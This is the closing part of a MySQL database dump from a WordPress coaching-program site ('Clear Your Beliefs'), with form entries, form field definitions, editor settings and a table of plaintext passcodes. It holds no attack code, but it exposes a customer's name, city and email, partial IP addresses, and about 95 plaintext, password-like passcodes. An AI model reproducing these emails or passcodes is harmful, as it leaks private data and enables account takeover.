pm)";}";s:9:"parent_id";s:1:"0";s:5:"value";s:99:"Morning (8 am to 11 am), Mid-day (11 am to 2 pm), Afternoon (2 pm to 6 pm), Evening (6 pm to 10 pm)";}i:9;a:7:{s:2:"id";s:2:"13";s:4:"slug";s:9:"time-zone";s:4:"name";s:9:"Time Zone";s:4:"type";s:6:"select";s:7:"options";s:1242:"a:24:{i:0;s:14:"U.S./Canada PT";i:1;s:14:"U.S./Canada MT";i:2;s:14:"U.S./Canada CT";i:3;s:14:"U.S./Canada ET";i:4;s:35:"Europe Azores Time Zone (UTC-01:00)";i:5;s:43:"Europe Greenwich Mean Time Zone (UTC+00:00)";i:6;s:45:"Europe Central European Time Zone (UTC+01:00)";i:7;s:53:"Europe Further-eastern European Time Zone (UTC+03:00)";i:8;s:45:"Europe Eastern European Time Zone (UTC+02:00)";i:9;s:35:"Europe Moscow Time Zone (UTC+04:00)";i:10;s:74:"Australia Mawson Station, Heard and McDonald Islands Time Zone (UTC+05:00)";i:11;s:45:"Australia Cocos Islands Time Zone (UTC+06:30)";i:12;s:55:"Australia Davis, Christmas Island Time Zone (UTC+07:00)";i:13;s:50:"Australia Australian Western Time Zone (UTC+08:00)";i:14;s:51:"Asia Israel, Eastern European Time Zone (UTC+02:00)";i:15;s:31:"Asia Iran Time Zone (UTC+03:30)";i:16;s:43:"Asia Azerbaijan, Gulf Time Zone (UTC+04:00)";i:17;s:52:"South America Paraguay, Amazon Time Zone (UTC-04:00)";i:18;s:33:"Asia Arabia Time Zone (UTC+03:00)";i:19;s:39:"Africa Cape Verde Time Zone (UTC-01:00)";i:20;s:40:"Africa West Africa Time Zone (UTC+01:00)";i:21;s:59:"South America Ecuador, Peru, Columbia Time Zone (UTC-05:00)";i:22;s:45:"South America Venezuela Time Zone (UTC-04:30)";i:23;s:5:"Other";}";s:9:"parent_id";s:1:"0";s:5:"value";s:14:"U.S./Canada CT";}i:10;a:7:{s:2:"id";s:2:"32";s:4:"slug";s:21:"choose-a-practitioner";s:4:"name";s:22:"Choose a Practitioner.";s:4:"type";s:8:"checkbox";s:7:"options";s:95:"a:2:{i:0;s:36:"Please Choose a Practitioner for Me.";i:1;s:29:"Let Me Choose a Practitioner.";}";s:9:"parent_id";s:1:"0";s:5:"value";s:0:"";}i:11;a:7:{s:2:"id";s:2:"25";s:4:"slug";s:10:"1st-choice";s:4:"name";s:10:"1st choice";s:4:"type";s:4:"text";s:7:"options";s:0:"";s:9:"parent_id";s:1:"0";s:5:"value";s:0:"";}i:12;a:7:{s:2:"id";s:2:"26";s:4:"slug";s:10:"2nd-choice";s:4:"name";s:10:"2nd choice";s:4:"type";s:4:"text";s:7:"options";s:0:"";s:9:"parent_id";s:1:"0";s:5:"value";s:0:"";}i:13;a:7:{s:2:"id";s:2:"27";s:4:"slug";s:10:"3rd-choice";s:4:"name";s:10:"3rd choice";s:4:"type";s:4:"text";s:7:"options";s:0:"";s:9:"parent_id";s:1:"0";s:5:"value";s:0:"";}i:14;a:7:{s:2:"id";s:2:"29";s:4:"slug";s:6:"userid";s:4:"name";s:6:"userid";s:4:"type";s:4:"text";s:7:"options";s:0:"";s:9:"parent_id";s:1:"0";s:5:"value";s:1:"0";}i:15;a:7:{s:2:"id";s:1:"2";s:4:"slug";s:12:"verification";s:4:"name";s:12:"Verification";s:4:"type";s:12:"verification";s:7:"options";s:0:"";s:9:"parent_id";s:1:"0";s:5:"value";s:0:"";}i:16;a:7:{s:2:"id";s:1:"3";s:4:"slug";s:27:"please-enter-any-two-digits";s:4:"name";s:27:"Please enter any two digits";s:4:"type";s:6:"secret";s:7:"options";s:0:"";s:9:"parent_id";s:1:"2";s:5:"value";s:2:"13";}i:17;a:7:{s:2:"id";s:1:"4";s:4:"slug";s:6:"submit";s:4:"name";s:6:"Submit";s:4:"type";s:6:"submit";s:7:"options";s:0:"";s:9:"parent_id";s:1:"2";s:5:"value";s:0:"";}}', 'CYB Plan Ordered', 'Clear Your Beliefs', 'blesko@leskowebengineering.com', 'a:1:{i:0;s:0:"";}', '2014-06-25 17:58:23', '2602:30a:2cf7:d1a0:981c:6', '1'),
(8, 1, 'a:21:{i:0;a:7:{s:2:"id";s:1:"1";s:4:"slug";s:8:"register";s:4:"name";s:8:"Register";s:4:"type";s:8:"fieldset";s:7:"options";s:0:"";s:9:"parent_id";s:1:"0";s:5:"value";s:0:"";}i:1;a:7:{s:2:"id";s:2:"33";s:4:"slug";s:2:"33";s:4:"name";s:0:"";s:4:"type";s:12:"instructions";s:7:"options";s:0:"";s:9:"parent_id";s:1:"0";s:5:"value";s:0:"";}i:2;a:7:{s:2:"id";s:2:"36";s:4:"slug";s:11:"access-code";s:4:"name";s:11:"Access Code";s:4:"type";s:4:"text";s:7:"options";s:0:"";s:9:"parent_id";s:1:"0";s:5:"value";s:6:"123456";}i:3;a:7:{s:2:"id";s:2:"21";s:4:"slug";s:16:"your-information";s:4:"name";s:16:"Your Information";s:4:"type";s:7:"section";s:7:"options";s:0:"";s:9:"parent_id";s:1:"0";s:5:"value";s:0:"";}i:4;a:7:{s:2:"id";s:1:"5";s:4:"slug";s:10:"first-name";s:4:"name";s:10:"First Name";s:4:"type";s:4:"text";s:7:"options";s:0:"";s:9:"parent_id";s:1:"0";s:5:"value";s:6:"Sharon";}i:5;a:7:{s:2:"id";s:1:"6";s:4:"slug";s:9:"last-name";s:4:"name";s:9:"Last Name";s:4:"type";s:4:"text";s:7:"options";s:0:"";s:9:"parent_id";s:1:"0";s:5:"value";s:9:"Wainscott";}i:6;a:7:{s:2:"id";s:1:"7";s:4:"slug";s:4:"city";s:4:"name";s:4:"City";s:4:"type";s:4:"text";s:7:"options";s:0:"";s:9:"parent_id";s:1:"0";s:5:"value";s:10:"Belleville";}i:7;a:7:{s:2:"id";s:2:"22";s:4:"slug";s:5:"email";s:4:"name";s:5:"Email";s:4:"type";s:5:"email";s:7:"options";s:0:"";s:9:"parent_id";s:1:"0";s:5:"value";s:19:"cressmgmt@gmail.com";}i:8;a:7:{s:2:"id";s:2:"34";s:4:"slug";s:25:"if-you-purchased-coaching";s:4:"name";s:25:"If You Purchased Coaching";s:4:"type";s:12:"instructions";s:7:"options";s:0:"";s:9:"parent_id";s:1:"0";s:5:"value";s:0:"";}i:9;a:7:{s:2:"id";s:2:"17";s:4:"slug";s:28:"coaching-daytime-preferences";s:4:"name";s:29:"Coaching Day/Time Preferences";s:4:"type";s:7:"section";s:7:"options";s:0:"";s:9:"parent_id";s:1:"0";s:5:"value";s:0:"";}i:10;a:7:{s:2:"id";s:2:"11";s:4:"slug";s:22:"good-days-for-coaching";s:4:"name";s:22:"Good Days for Coaching";s:4:"type";s:8:"checkbox";s:7:"options";s:93:"a:7:{i:0;s:1:"M";i:1;s:1:"T";i:2;s:1:"W";i:3;s:2:"Th";i:4;s:1:"F";i:5;s:2:"Sa";i:6;s:2:"Su";}";s:9:"parent_id";s:1:"0";s:5:"value";s:1:"M";}i:11;a:7:{s:2:"id";s:2:"12";s:4:"slug";s:23:"good-times-for-coaching";s:4:"name";s:23:"Good Times for Coaching";s:4:"type";s:8:"checkbox";s:7:"options";s:147:"a:4:{i:0;s:23:"Morning (8 am to 11 am)";i:1;s:23:"Mid-day (11 am to 2 pm)";i:2;s:24:"Afternoon (2 pm to 6 pm)";i:3;s:23:"Evening (6 pm to 10 pm)";}";s:9:"parent_id";s:1:"0";s:5:"value";s:23:"Morning (8 am to 11 am)";}i:12;a:7:{s:2:"id";s:2:"13";s:4:"slug";s:9:"time-zone";s:4:"name";s:9:"Time Zone";s:4:"type";s:6:"select";s:7:"options";s:1242:"a:24:{i:0;s:14:"U.S./Canada PT";i:1;s:14:"U.S./Canada MT";i:2;s:14:"U.S./Canada CT";i:3;s:14:"U.S./Canada ET";i:4;s:35:"Europe Azores Time Zone (UTC-01:00)";i:5;s:43:"Europe Greenwich Mean Time Zone (UTC+00:00)";i:6;s:45:"Europe Central European Time Zone (UTC+01:00)";i:7;s:53:"Europe Further-eastern European Time Zone (UTC+03:00)";i:8;s:45:"Europe Eastern European Time Zone (UTC+02:00)";i:9;s:35:"Europe Moscow Time Zone (UTC+04:00)";i:10;s:74:"Australia Mawson Station, Heard and McDonald Islands Time Zone (UTC+05:00)";i:11;s:45:"Australia Cocos Islands Time Zone (UTC+06:30)";i:12;s:55:"Australia Davis, Christmas Island Time Zone (UTC+07:00)";i:13;s:50:"Australia Australian Western Time Zone (UTC+08:00)";i:14;s:51:"Asia Israel, Eastern European Time Zone (UTC+02:00)";i:15;s:31:"Asia Iran Time Zone (UTC+03:30)";i:16;s:43:"Asia Azerbaijan, Gulf Time Zone (UTC+04:00)";i:17;s:52:"South America Paraguay, Amazon Time Zone (UTC-04:00)";i:18;s:33:"Asia Arabia Time Zone (UTC+03:00)";i:19;s:39:"Africa Cape Verde Time Zone (UTC-01:00)";i:20;s:40:"Africa West Africa Time Zone (UTC+01:00)";i:21;s:59:"South America Ecuador, Peru, Columbia Time Zone (UTC-05:00)";i:22;s:45:"South America Venezuela Time Zone (UTC-04:30)";i:23;s:5:"Other";}";s:9:"parent_id";s:1:"0";s:5:"value";s:14:"U.S./Canada CT";}i:13;a:7:{s:2:"id";s:2:"32";s:4:"slug";s:21:"choose-a-practitioner";s:4:"name";s:22:"Choose a Practitioner.";s:4:"type";s:8:"checkbox";s:7:"options";s:95:"a:2:{i:0;s:36:"Please Choose a Practitioner for Me.";i:1;s:29:"Let Me Choose a Practitioner.";}";s:9:"parent_id";s:1:"0";s:5:"value";s:0:"";}i:14;a:7:{s:2:"id";s:2:"25";s:4:"slug";s:10:"1st-choice";s:4:"name";s:10:"1st choice";s:4:"type";s:4:"text";s:7:"options";s:0:"";s:9:"parent_id";s:1:"0";s:5:"value";s:0:"";}i:15;a:7:{s:2:"id";s:2:"26";s:4:"slug";s:10:"2nd-choice";s:4:"name";s:10:"2nd choice";s:4:"type";s:4:"text";s:7:"options";s:0:"";s:9:"parent_id";s:1:"0";s:5:"value";s:0:"";}i:16;a:7:{s:2:"id";s:2:"27";s:4:"slug";s:10:"3rd-choice";s:4:"name";s:10:"3rd choice";s:4:"type";s:4:"text";s:7:"options";s:0:"";s:9:"parent_id";s:1:"0";s:5:"value";s:0:"";}i:17;a:7:{s:2:"id";s:2:"29";s:4:"slug";s:6:"userid";s:4:"name";s:6:"userid";s:4:"type";s:4:"text";s:7:"options";s:0:"";s:9:"parent_id";s:1:"0";s:5:"value";s:1:"0";}i:18;a:7:{s:2:"id";s:1:"2";s:4:"slug";s:12:"verification";s:4:"name";s:12:"Verification";s:4:"type";s:12:"verification";s:7:"options";s:0:"";s:9:"parent_id";s:1:"0";s:5:"value";s:0:"";}i:19;a:7:{s:2:"id";s:1:"3";s:4:"slug";s:27:"please-enter-any-two-digits";s:4:"name";s:27:"Please enter any two digits";s:4:"type";s:6:"secret";s:7:"options";s:0:"";s:9:"parent_id";s:1:"2";s:5:"value";s:2:"13";}i:20;a:7:{s:2:"id";s:1:"4";s:4:"slug";s:6:"submit";s:4:"name";s:6:"Submit";s:4:"type";s:6:"submit";s:7:"options";s:0:"";s:9:"parent_id";s:1:"2";s:5:"value";s:0:"";}}', 'CYB Plan Ordered', 'Clear Your Beliefs', 'blesko@leskowebengineering.com', 'a:1:{i:0;s:0:"";}', '2014-06-28 11:47:35', '2602:30a:2cf7:d1a0:e061:b', '1');

-- --------------------------------------------------------

--
-- Table structure for table `cyb_visual_form_builder_fields`
--

CREATE TABLE IF NOT EXISTS `cyb_visual_form_builder_fields` (
  `field_id` bigint(20) NOT NULL AUTO_INCREMENT,
  `form_id` bigint(20) NOT NULL,
  `field_key` varchar(255) NOT NULL,
  `field_type` varchar(25) NOT NULL,
  `field_options` text,
  `field_description` text,
  `field_name` text NOT NULL,
  `field_sequence` bigint(20) DEFAULT '0',
  `field_parent` bigint(20) DEFAULT '0',
  `field_validation` varchar(25) DEFAULT NULL,
  `field_required` varchar(25) DEFAULT NULL,
  `field_size` varchar(25) DEFAULT 'medium',
  `field_css` varchar(255) DEFAULT NULL,
  `field_layout` varchar(255) DEFAULT NULL,
  `field_default` text,
  PRIMARY KEY (`field_id`)
) ENGINE=MyISAM  DEFAULT CHARSET=utf8 AUTO_INCREMENT=51 ;

--
-- Dumping data for table `cyb_visual_form_builder_fields`
--

INSERT INTO `cyb_visual_form_builder_fields` (`field_id`, `form_id`, `field_key`, `field_type`, `field_options`, `field_description`, `field_name`, `field_sequence`, `field_parent`, `field_validation`, `field_required`, `field_size`, `field_css`, `field_layout`, `field_default`) VALUES
(1, 1, 'register', 'fieldset', '', '', 'Register', 0, 0, '', '', '', '', '', ''),
(2, 1, 'verification', 'verification', '', '', 'Verification', 18, 0, '', '', '', '', '', ''),
(3, 1, 'please-enter-any-two-digits', 'secret', '', 'Example: 12', 'Please enter any two digits', 19, 2, '', 'yes', 'medium', '', '', ''),
(4, 1, 'submit', 'submit', '', '', 'Submit', 20, 2, '', '', '', '', '', ''),
(5, 1, 'first-name', 'text', '', '', 'First Name', 4, 0, '', 'yes', 'medium', '', 'left-half', ''),
(6, 1, 'last-name', 'text', '', '', 'Last Name', 5, 0, '', 'no', 'medium', '', 'right-half', ''),
(7, 1, 'city', 'text', '', '', 'City', 6, 0, '', 'yes', 'medium', '', 'left-half', ''),
(13, 1, 'time-zone', 'select', 'a:24:{i:0;s:14:"U.S./Canada PT";i:1;s:14:"U.S./Canada MT";i:2;s:14:"U.S./Canada CT";i:3;s:14:"U.S./Canada ET";i:4;s:35:"Europe Azores Time Zone (UTC-01:00)";i:5;s:43:"Europe Greenwich Mean Time Zone (UTC+00:00)";i:6;s:45:"Europe Central European Time Zone (UTC+01:00)";i:7;s:53:"Europe Further-eastern European Time Zone (UTC+03:00)";i:8;s:45:"Europe Eastern European Time Zone (UTC+02:00)";i:9;s:35:"Europe Moscow Time Zone (UTC+04:00)";i:10;s:74:"Australia Mawson Station, Heard and McDonald Islands Time Zone (UTC+05:00)";i:11;s:45:"Australia Cocos Islands Time Zone (UTC+06:30)";i:12;s:55:"Australia Davis, Christmas Island Time Zone (UTC+07:00)";i:13;s:50:"Australia Australian Western Time Zone (UTC+08:00)";i:14;s:51:"Asia Israel, Eastern European Time Zone (UTC+02:00)";i:15;s:31:"Asia Iran Time Zone (UTC+03:30)";i:16;s:43:"Asia Azerbaijan, Gulf Time Zone (UTC+04:00)";i:17;s:52:"South America Paraguay, Amazon Time Zone (UTC-04:00)";i:18;s:33:"Asia Arabia Time Zone (UTC+03:00)";i:19;s:39:"Africa Cape Verde Time Zone (UTC-01:00)";i:20;s:40:"Africa West Africa Time Zone (UTC+01:00)";i:21;s:59:"South America Ecuador, Peru, Columbia Time Zone (UTC-05:00)";i:22;s:45:"South America Venezuela Time Zone (UTC-04:30)";i:23;s:5:"Other";}', '', 'Time Zone', 12, 0, '', 'no', 'small', '', 'right-half', ''),
(12, 1, 'good-times-for-coaching', 'checkbox', 'a:4:{i:0;s:23:"Morning (8 am to 11 am)";i:1;s:23:"Mid-day (11 am to 2 pm)";i:2;s:24:"Afternoon (2 pm to 6 pm)";i:3;s:23:"Evening (6 pm to 10 pm)";}', 'Check as many as apply.', 'Good Times for Coaching', 11, 0, '', 'no', '', '', 'right-half', ''),
(11, 1, 'good-days-for-coaching', 'checkbox', 'a:7:{i:0;s:1:"M";i:1;s:1:"T";i:2;s:1:"W";i:3;s:2:"Th";i:4;s:1:"F";i:5;s:2:"Sa";i:6;s:2:"Su";}', 'Check as many as apply.', 'Good Days for Coaching', 10, 0, '', 'no', '', '', 'left-half', ''),
(17, 1, 'coaching-daytime-preferences', 'section', '', '', 'Coaching Day/Time Preferences', 9, 0, '', '', '', '', '', ''),
(21, 1, 'your-information', 'section', '', '', 'Your Information', 3, 0, '', '', '', '', '', ''),
(22, 1, 'email', 'email', '', '', 'Email', 7, 0, 'email', 'yes', 'medium', '', 'right-half', ''),
(25, 1, '1st-choice', 'text', '', '', '1st choice', 14, 0, '', 'no', 'medium', '', '', ''),
(26, 1, '2nd-choice', 'text', '', '', '2nd choice', 15, 0, '', 'no', 'medium', '', '', ''),
(27, 1, '3rd-choice', 'text', '', '', '3rd choice', 16, 0, '', 'no', 'medium', '', '', ''),
(29, 1, 'userid', 'text', '', '', 'userid', 17, 0, '', 'no', 'medium', 'hidden', '', ''),
(32, 1, 'choose-a-practitioner', 'checkbox', 'a:2:{i:0;s:36:"Please Choose a Practitioner for Me.";i:1;s:29:"Let Me Choose a Practitioner.";}', '', 'Choose a Practitioner.', 13, 0, '', 'no', '', '', '', ''),
(33, 1, '33', 'instructions', '', 'Thank you for purchasing the Clear Your Beliefs Package! Please register for access to the Resources page.', '', 1, 0, '', '', '', '', '', ''),
(34, 1, 'if-you-purchased-coaching', 'instructions', '', 'For those who have purchased coaching, please indicate the best days and times for your coaching.', 'If You Purchased Coaching', 8, 0, '', '', '', '', '', ''),
(36, 1, 'access-code', 'text', '', 'Please check the email you received upon purchase of the Clear Your Beliefs program for your access code and enter it here:', 'Access Code', 2, 0, '', 'yes', 'large', '', '', '');

-- --------------------------------------------------------

--
-- Table structure for table `cyb_visual_form_builder_forms`
--

CREATE TABLE IF NOT EXISTS `cyb_visual_form_builder_forms` (
  `form_id` bigint(20) NOT NULL AUTO_INCREMENT,
  `form_key` tinytext NOT NULL,
  `form_title` text NOT NULL,
  `form_email_subject` text,
  `form_email_to` text,
  `form_email_from` varchar(255) DEFAULT NULL,
  `form_email_from_name` varchar(255) DEFAULT NULL,
  `form_email_from_override` varchar(255) DEFAULT NULL,
  `form_email_from_name_override` varchar(255) DEFAULT NULL,
  `form_success_type` varchar(25) DEFAULT 'text',
  `form_success_message` text,
  `form_notification_setting` varchar(25) DEFAULT NULL,
  `form_notification_email_name` varchar(255) DEFAULT NULL,
  `form_notification_email_from` varchar(255) DEFAULT NULL,
  `form_notification_email` varchar(25) DEFAULT NULL,
  `form_notification_subject` varchar(255) DEFAULT NULL,
  `form_notification_message` text,
  `form_notification_entry` varchar(25) DEFAULT NULL,
  `form_label_alignment` varchar(25) DEFAULT NULL,
  PRIMARY KEY (`form_id`)
) ENGINE=MyISAM  DEFAULT CHARSET=utf8 AUTO_INCREMENT=4 ;

--
-- Dumping data for table `cyb_visual_form_builder_forms`
--

INSERT INTO `cyb_visual_form_builder_forms` (`form_id`, `form_key`, `form_title`, `form_email_subject`, `form_email_to`, `form_email_from`, `form_email_from_name`, `form_email_from_override`, `form_email_from_name_override`, `form_success_type`, `form_success_message`, `form_notification_setting`, `form_notification_email_name`, `form_notification_email_from`, `form_notification_email`, `form_notification_subject`, `form_notification_message`, `form_notification_entry`, `form_label_alignment`) VALUES
(1, 'register-for-coaching-access-to-library', 'Register for Coaching & Access to Library', 'CYB Plan Ordered', 'a:1:{i:0;s:0:"";}', 'blesko@leskowebengineering.com', 'Clear Your Beliefs', '', '', 'text', '&lt;p&gt;Thank you for registering!&lt;/p&gt;\n&lt;p&gt;If you haven\\''t already, check your email for your link to the Resources page to download the program. Any time you need access to the Resources page, use the link in your email.&lt;/p&gt;\n', '', '', '', '', '', '', '', '');

-- --------------------------------------------------------

--
-- Table structure for table `cyb_wpclone`
--

CREATE TABLE IF NOT EXISTS `cyb_wpclone` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `backup_name` varchar(250) COLLATE latin1_general_ci NOT NULL,
  `backup_size` int(11) DEFAULT NULL,
  `data_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `creator` varchar(60) COLLATE latin1_general_ci NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1 COLLATE=latin1_general_ci AUTO_INCREMENT=1 ;

-- --------------------------------------------------------

--
-- Table structure for table `cyb_wpeditor_settings`
--

CREATE TABLE IF NOT EXISTS `cyb_wpeditor_settings` (
  `key` varchar(50) COLLATE latin1_general_ci NOT NULL,
  `value` text COLLATE latin1_general_ci NOT NULL,
  PRIMARY KEY (`key`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1 COLLATE=latin1_general_ci;

--
-- Dumping data for table `cyb_wpeditor_settings`
--

INSERT INTO `cyb_wpeditor_settings` (`key`, `value`) VALUES
('version', '1.2.6.2'),
('upgrade', '1'),
('enable_post_editor', '1'),
('hide_default_plugin_editor', '1'),
('hide_default_theme_editor', '1'),
('replace_plugin_edit_links', '1'),
('enable_plugin_line_numbers', '1'),
('enable_theme_line_numbers', '1'),
('enable_post_line_numbers', '1'),
('enable_plugin_line_wrapping', '1'),
('enable_theme_line_wrapping', '1'),
('enable_post_line_wrapping', '1'),
('enable_plugin_active_line', '1'),
('enable_theme_active_line', '1'),
('enable_post_active_line', '1'),
('plugin_editor_allowed_extensions', 'php~js~css~txt~htm~html~jpg~jpeg~png~gif~sql~po~less~xml'),
('theme_editor_allowed_extensions', 'php~js~css~txt~htm~html~jpg~jpeg~png~gif~sql~po~less~xml'),
('plugin_file_upload', '1'),
('theme_file_upload', '1'),
('plugin_indent_unit', '2'),
('theme_indent_unit', '2'),
('post_indent_unit', '2'),
('admin_page_roles', 'a:3:{s:8:"settings";s:14:"manage_options";s:12:"theme-editor";s:11:"edit_themes";s:13:"plugin-editor";s:12:"edit_plugins";}');

-- --------------------------------------------------------

--
-- Table structure for table `passcodes`
--

CREATE TABLE IF NOT EXISTS `passcodes` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `passcode` varchar(255) COLLATE latin1_general_ci NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM  DEFAULT CHARSET=latin1 COLLATE=latin1_general_ci AUTO_INCREMENT=125 ;

--
-- Dumping data for table `passcodes`
--

INSERT INTO `passcodes` (`id`, `passcode`) VALUES
(1, '123'),
(25, 'bambi'),
(26, 'cook02ml'),
(29, 'Hillside34'),
(30, 'MH123456'),
(31, 'BV123456'),
(32, 'Emily'),
(33, 'sophie'),
(34, 'porsche'),
(35, 'goddess'),
(36, 'prapata0716'),
(37, 'a1542ndb'),
(38, 'Superstrings'),
(39, 'sadiesue1997'),
(40, '1969'),
(41, 'skampy'),
(42, 'bailey1'),
(43, 'ouchy72'),
(44, 'judo07015'),
(45, 'Xantha4690'),
(46, 'oceana'),
(47, 'uAnaJk8e'),
(48, 'ishwara12'),
(49, 'hooligan'),
(50, 'Freedom2b'),
(51, '335333'),
(52, 'ballina2015'),
(53, '1717'),
(54, 'mara2013'),
(55, 'netnetnoah'),
(56, 'Cbceffev1'),
(57, 'Kathie!0'),
(58, '555555'),
(59, 'Marathon69'),
(60, 'Freet0day'),
(61, 'ClearBeliefs42!'),
(62, 'RsNW6o2x'),
(63, 'imclear2'),
(64, 'sunshinecoast'),
(65, 'baperras'),
(66, 'fearsblocks'),
(67, '12345'),
(68, 'secret10'),
(69, 'Int3grat10n'),
(70, 'jamieoliver_%758'),
(71, 'Taoist2015'),
(72, 'EternalMidgeLu21'),
(73, 'j2120531'),
(74, 'Estrellas'),
(75, 'Freedom1823'),
(76, 'Lexisclear'),
(77, '568381'),
(78, 'InTj1234'),
(79, 'Ray2261'),
(80, 'ngozzz60'),
(81, 'Cruisin02'),
(82, 'zhaleh258'),
(83, 'debtFr3341'),
(84, 'zipper'),
(85, 'pdpds.rg'),
(86, 'russkay'),
(87, 'aulash3020'),
(88, 'abcde12345x'),
(89, 'elephant829'),
(90, 'sergma89'),
(91, 'Sunday121'),
(92, 'Wisdomthak2'),
(93, 'kathleen291'),
(94, 'sayyeah'),
(95, 'wesley1652'),
(96, 'Sp1r1tIAm'),
(97, 'dharmabum'),
(98, 'earlmyfriend'),
(99, 'jbgclear6'),
(100, 'dpSvjMLJDway'),
(101, 'ltlklj30'),
(102, 'Pch3377'),
(103, 'Redwood55'),
(104, 'gryphon1'),
(105, 'greatful'),
(106, 'Aries329'),
(107, 'TansyCakes'),
(108, 'jail2hay'),
(109, 'Esteban2015'),
(110, 'deb33'),
(111, '2864FISH'),
(112, 'CYB101'),
(113, '43982frenchFries'),
(114, 'belieffreedom'),
(115, 'Sunsh1n3%'),
(116, 'AnalaW0tsit'),
(117, 'tol1500'),
(118, 'gator141'),
(119, '9JdNsWbrfPYQ'),
(120, '1952'),
(121, 'Musica'),
(122, 'NLPRAP16Quadrants!'),
(123, 'einstein'),
(124, 'Nate11011319!');

-- --------------------------------------------------------

--
-- Table structure for table `WSP_Orders`
--

CREATE TABLE IF NOT EXISTS `WSP_Orders` (
  `Order_id` int(11) NOT NULL AUTO_INCREMENT,
  `first_name` tinytext COLLATE latin1_general_ci NOT NULL,
  `last_name` tinytext COLLATE latin1_general_ci NOT NULL,
  `email` tinytext COLLATE latin1_general_ci NOT NULL,
  `address1` text COLLATE latin1_general_ci NOT NULL,
  `address2` text COLLATE latin1_general_ci NOT NULL,
  `address3` text COLLATE latin1_general_ci NOT NULL,
  `zip` int(80) NOT NULL,
  `Mobile_number` int(80) NOT NULL,
  UNIQUE KEY `id` (`Order_id`)
) ENGINE=MyISAM  DEFAULT CHARSET=latin1 COLLATE=latin1_general_ci AUTO_INCREMENT=2 ;

--
-- Dumping data for table `WSP_Orders`
--

INSERT INTO `WSP_Orders` (`Order_id`, `first_name`, `last_name`, `email`, `address1`, `address2`, `address3`, `zip`, `Mobile_number`) VALUES
(1, '', '', '', '', '', '', 0, 0);

/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
